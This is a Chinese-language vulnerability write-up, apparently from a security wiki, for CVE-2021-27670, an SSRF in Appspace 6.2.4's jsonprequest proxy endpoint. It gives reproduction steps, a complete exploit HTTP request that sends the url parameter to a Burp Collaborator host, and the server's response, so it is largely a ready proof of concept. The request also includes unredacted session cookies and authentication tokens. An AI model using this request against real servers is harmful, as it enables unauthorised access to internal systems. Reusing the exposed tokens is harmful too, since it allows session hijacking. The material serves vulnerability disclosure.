跳转至

Appspace 6.2.4 SSRF (CVE-2021-27670)

Appspace 6.2.4允许通过 api/v1/core/proxy/jsonprequest url参数进行SSRF。

复现步骤:

  • 1.访问subdomain.target.com/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=payload
  • 2.将Url = 的值更改为服务器地址
  • 3.转发请求并检查日志和响应
  • 4.得到响应

Demo:

GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://kui5ntipd353w4eekwtxhc5af1lu9oxel58ywn.burpcollaborator.net? HTTP/1.1
Host: redacted.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 
Accept: / 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: text/plain 
RemoveHeader-Transfer-Encoding: true 
ExtraHeader-Access-Control-Expose-Headers: Removed-X-Frame-Options 
RemoveHeader-X-Frame-Options: true 
X-Requested-With: XMLHttpRequest 
Connection: close 
Referer: https://redacted.com/library/virtual/library/workspaces/dcdc8c58-f282-4d79-b519-bf093273ff58/index.html?editing=true&display_mode=tv 
Cookie: _gcl_au=1.1.605860964.1611041064; _ga=GA1.2.237028277.1611041073; _fbp=fb.1.1613375264845.130352864; ASP.NET_SessionId=hrm4kw45gl2ikz55rylyxm45; __AntiXsrfToken=e3a9153874de4f03800ea59f647b5bec; appspace-core-token=c2bd442f-8a97-46fe-8341-e27b30e6a146; ticket=c2bd442f-8a97-46fe-8341-e27b30e6a146; logincookie=AFDF47507F483F7944E5B6D99246310F6CA4300B6BC43EF47B8A73C52AAF2165BC3D79B0C573DA1189B586F86DDEEA19CD820DA2E0EB269812587CDFF3A08CF74907E6D1C370490A37DC8DEF89ADE6117A1806F6A6D83609AA5A47A9A02766CFE33193726211736D5B07B056CE53B9EADC7723CDFE99A9F1AD499CB399B5F1B88A58822B1BC4BE537C704E8F89F9496FA7972266AA00328F524443BC95D29D0B902BF81AAF3AA748FEBA342A2402EDB35A05038AEC3948C60C34B4B99A52F76E0E16F2A43F33295F6FCF83C107453CCC2D762EAB; __RequestVerificationToken_L2xpYnJhcnk1=sVXhPQSiCj559qE00AolIlSK2peRu_X1qWB8rKI-XpShQ1ewAynE98K06L4jIGvklTAFiSYWXBw16C9w8XwLnME2ITpVvnD66BYjVBUm5ys1

Response: 

HTTP/1.1 200 OK 
Cache-Control: no-cache, no-store 
Content-Type: text/html 
Vary: Accept-Encoding 
X-Collaborator-Version: 4 
Access-Control-Expose-Headers: Removed-X-Frame-Options 
Access-Control-Allow-Origin: * 
Access-Control-Request-Methods: GET, POST, PUT, DELETE, OPTIONS 
Access-Control-Allow-Headers: authorization,origin,x-my-header,host,accept,content-type,cache-control 
Access-Control-Allow-Origin: * Date: Wed, 24 Feb 2021 06:19:52 GMT 
Connection: close 
Content-Length: 61

dlgnon6ksjta2ya1tg7gq2zjlgmgigjflgz

ref: